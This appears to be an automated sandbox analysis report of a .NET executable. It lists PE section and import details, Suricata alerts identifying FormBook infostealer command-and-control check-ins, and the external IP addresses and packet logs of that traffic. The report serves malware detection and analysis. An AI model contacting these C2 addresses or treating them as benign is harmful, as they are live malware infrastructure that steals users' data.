                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xe8e350x4f.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x62c.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xe1ed00x54.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x20000xe6e900xe700057c1d80d575a5061541cb2c0c14f4b61False0.7894007034632035data7.5545631367801445IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0xea0000x62c0x800254f06fd7fa564e3bef360e1ab4c5388False0.33837890625data3.466674679946595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0xec0000xc0x2001764babad283d10a82a7bf6a1153bc26False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_VERSION0xea0900x39cdata0.41883116883116883
                                                                                                                              RT_MANIFEST0xea43c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                              Network Behavior

                                                                                                                              Suricata IDS Alerts

                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-10-07T12:33:30.413477+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6498643.33.130.19080TCP
                                                                                                                              2024-10-07T12:33:30.413477+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6498643.33.130.19080TCP
                                                                                                                              2024-10-07T12:33:47.257489+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649969119.18.54.2780TCP
                                                                                                                              2024-10-07T12:33:49.804750+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649987119.18.54.2780TCP
                                                                                                                              2024-10-07T12:33:52.367188+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649992119.18.54.2780TCP
                                                                                                                              2024-10-07T12:33:54.877005+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649994119.18.54.2780TCP
                                                                                                                              2024-10-07T12:33:54.877005+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649994119.18.54.2780TCP
                                                                                                                              2024-10-07T12:34:00.757031+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995104.21.5.12580TCP
                                                                                                                              2024-10-07T12:34:03.309278+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996104.21.5.12580TCP
                                                                                                                              2024-10-07T12:34:05.847786+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998104.21.5.12580TCP
                                                                                                                              2024-10-07T12:34:08.398289+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649999104.21.5.12580TCP
                                                                                                                              2024-10-07T12:34:08.398289+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649999104.21.5.12580TCP
                                                                                                                              2024-10-07T12:34:13.941938+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500003.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:16.462640+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500013.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:20.039330+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500033.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:22.447412+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500043.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:22.447412+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500043.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:28.111247+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005162.0.215.3380TCP
                                                                                                                              2024-10-07T12:34:30.678244+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006162.0.215.3380TCP
                                                                                                                              2024-10-07T12:34:33.201827+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008162.0.215.3380TCP
                                                                                                                              2024-10-07T12:34:35.712226+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650009162.0.215.3380TCP
                                                                                                                              2024-10-07T12:34:35.712226+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650009162.0.215.3380TCP
                                                                                                                              2024-10-07T12:34:41.559097+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010161.97.168.24580TCP
                                                                                                                              2024-10-07T12:34:44.112473+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011161.97.168.24580TCP
                                                                                                                              2024-10-07T12:34:46.654874+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650012161.97.168.24580TCP
                                                                                                                              2024-10-07T12:34:49.206027+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650013161.97.168.24580TCP
                                                                                                                              2024-10-07T12:34:49.206027+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013161.97.168.24580TCP
                                                                                                                              2024-10-07T12:34:54.742279+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500143.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:57.262281+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500153.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:59.817849+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500163.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:02.512579+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500173.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:02.512579+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500173.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:08.027836+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500193.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:11.501332+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500203.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:14.164268+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500213.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:15.652529+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500223.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:15.652529+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500223.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:21.946304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:24.477025+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650024209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:27.215648+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:29.758274+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650026209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:29.758274+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650026209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:35.797681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002768.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:38.348515+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002868.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:40.922359+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002968.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:43.466281+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003068.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:43.466281+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003068.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:48.971881+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500313.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:52.446394+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500323.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:54.075073+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500333.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:56.623411+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500343.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:56.623411+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500343.33.130.19080TCP
                                                                                                                              2024-10-07T12:36:11.020258+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003538.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:13.566533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003638.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:16.078392+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003738.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:18.635812+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003838.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:18.635812+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003838.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:24.286083+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650040162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:26.838386+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650041162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:29.376188+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650042162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:31.961637+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650043162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:31.961637+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650043162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:37.921582+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500448.217.17.19280TCP
                                                                                                                              2024-10-07T12:36:40.470406+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500458.217.17.19280TCP
                                                                                                                              2024-10-07T12:36:43.038469+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500468.217.17.19280TCP
                                                                                                                              2024-10-07T12:37:06.037449+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500478.217.17.19280TCP
                                                                                                                              2024-10-07T12:37:06.037449+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500478.217.17.19280TCP

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 7, 2024 12:33:29.942090034 CEST4986480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:33:29.947004080 CEST80498643.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:29.947101116 CEST4986480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:33:29.953324080 CEST4986480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:33:29.958178043 CEST80498643.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:30.413278103 CEST80498643.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:30.413317919 CEST80498643.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:30.413476944 CEST4986480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:33:30.416186094 CEST4986480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:33:30.421153069 CEST80498643.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:46.247889996 CEST4996980192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:46.252760887 CEST8049969119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:46.254173994 CEST4996980192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:46.262151957 CEST4996980192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:46.267096996 CEST8049969119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:47.257277012 CEST8049969119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:47.257424116 CEST8049969119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:47.257488966 CEST4996980192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:47.797904968 CEST4996980192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:48.808706999 CEST4998780192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:48.813638926 CEST8049987119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:48.813735962 CEST4998780192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:48.825151920 CEST4998780192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:48.830178976 CEST8049987119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:49.803615093 CEST8049987119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:49.804697037 CEST8049987119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:49.804749966 CEST4998780192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:50.335998058 CEST4998780192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:51.355798960 CEST4999280192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:51.360733986 CEST8049992119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:51.360862970 CEST4999280192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:51.374537945 CEST4999280192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:51.379477024 CEST8049992119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:51.379523039 CEST8049992119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:52.367022038 CEST8049992119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:52.367110968 CEST8049992119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:52.367187977 CEST4999280192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:52.886358976 CEST4999280192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:53.901002884 CEST4999480192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:53.906132936 CEST8049994119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:53.906349897 CEST4999480192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:53.914181948 CEST4999480192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:53.919161081 CEST8049994119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:54.876702070 CEST8049994119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:54.876904011 CEST8049994119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:54.877005100 CEST4999480192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:54.879313946 CEST4999480192.168.2.6119.18.54.27
                                                                                                                              Oct 7, 2024 12:33:54.884183884 CEST8049994119.18.54.27192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:59.907582045 CEST4999580192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:33:59.912523985 CEST8049995104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:59.912612915 CEST4999580192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:33:59.921257019 CEST4999580192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:33:59.926115036 CEST8049995104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:00.756877899 CEST8049995104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:00.756895065 CEST8049995104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:00.757030964 CEST4999580192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:00.757906914 CEST8049995104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:00.757983923 CEST4999580192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:01.429899931 CEST4999580192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:02.447917938 CEST4999680192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:02.452821970 CEST8049996104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:02.452924013 CEST4999680192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:02.461504936 CEST4999680192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:02.466370106 CEST8049996104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:03.309200048 CEST8049996104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:03.309217930 CEST8049996104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:03.309278011 CEST4999680192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:03.309567928 CEST8049996104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:03.309612989 CEST4999680192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:04.005275965 CEST4999680192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:05.011909008 CEST4999880192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:05.016886950 CEST8049998104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:05.016995907 CEST4999880192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:05.032109976 CEST4999880192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:05.037066936 CEST8049998104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:05.037175894 CEST8049998104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:05.847724915 CEST8049998104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:05.847742081 CEST8049998104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:05.847754002 CEST8049998104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:05.847785950 CEST4999880192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:05.847815990 CEST4999880192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:06.539133072 CEST4999880192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:07.562582970 CEST4999980192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:07.567823887 CEST8049999104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:07.568022966 CEST4999980192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:07.574522018 CEST4999980192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:07.579471111 CEST8049999104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:08.398132086 CEST8049999104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:08.398183107 CEST8049999104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:08.398288965 CEST4999980192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:08.398296118 CEST8049999104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:08.398339987 CEST4999980192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:08.400535107 CEST4999980192.168.2.6104.21.5.125
                                                                                                                              Oct 7, 2024 12:34:08.405524015 CEST8049999104.21.5.125192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:13.441201925 CEST5000080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:13.446188927 CEST80500003.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:13.446269989 CEST5000080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:13.454796076 CEST5000080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:13.459790945 CEST80500003.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:13.941833973 CEST80500003.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:13.941937923 CEST5000080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:14.963787079 CEST5000080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:14.968823910 CEST80500003.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:15.983361006 CEST5000180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:15.988512039 CEST80500013.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:15.988590956 CEST5000180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:15.997273922 CEST5000180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:16.002648115 CEST80500013.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:16.462503910 CEST80500013.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:16.462640047 CEST5000180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:17.507884026 CEST5000180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:17.512749910 CEST80500013.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:18.525608063 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:18.530544043 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:18.530635118 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:18.537975073 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:18.542820930 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:18.542911053 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:20.039330006 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:20.045258045 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:20.045309067 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.057733059 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.062721014 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:21.062819958 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.068662882 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.073477030 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:22.446708918 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:22.446728945 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:22.447412014 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:22.450231075 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:22.455041885 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:27.480494976 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:27.485497952 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:27.485558033 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:27.501383066 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:27.506234884 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111026049 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111044884 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111056089 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111212015 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111222029 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111232996 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111247063 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:28.114547968 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:29.007858992 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.031415939 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.036329985 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.039411068 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.051422119 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.056334972 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.677895069 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.677911997 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.677922010 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678037882 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678049088 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678060055 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678244114 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.678244114 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:31.557970047 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.574425936 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.579560995 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:32.580127001 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.589368105 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.594419956 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:32.594451904 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201721907 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201790094 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201807022 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201822996 CEST8050008162.0.215.33192.168.2.6
